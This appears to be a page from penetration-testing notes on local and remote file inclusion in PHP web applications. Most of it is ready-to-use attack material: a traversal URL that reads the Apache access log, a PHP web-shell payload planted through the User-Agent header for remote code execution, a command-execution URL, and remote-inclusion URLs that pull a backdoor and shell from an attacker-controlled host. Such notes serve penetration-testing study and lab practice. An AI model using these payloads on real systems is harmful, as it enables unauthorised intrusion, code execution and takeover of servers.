LFI & RFI

Local File Inclusion

Directory traversal is used to read the contents of a file outside of the web server’s web root. File inclusion vulnerabilities allow us to include a file in the application’s running code allowing use to execute local or remote files

Log Injection

Display contents of a log file (if dir traversal is present)

http://adot.com/app/index.php?page=../../../../../var/log/apache2/access.log

It should have something like the following

10.10.14.1 - - [19/Jun/2024:12:11:34 +0000] "GET /app/index.php?page=admin.php
HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
Firefox/91.0"

We can then edit the User-Agent to the following in Burp for RCE

<?php echo system($_GET['cmd']); ?>

Now when we request the access log and add our command with the cmd parameter it will execute

http://adot.com/app/index.php?page=../../../../../var/log/apache2/access.log&cmd=whoami

Windows apache logs located at C:\xampp\apache\logs\

Remote File Inclusion

Same concept as LFI except with remote files that can be accessed over HTTP or SMB. The allow_url_include options needs to be enabled within the PHP application to leverage this.

/usr/share/webshells/php/simple-backdoor.php

http://adot.com/app/index.php?page=http://10.10.14.10/simple-backdoor.php&cmd=whoami
http://adot.com/app/index.php?page=http://10.10.14.10/shell.php

PreviousDirectory Traversal NextPHP Wrappers

Last updated 11 months ago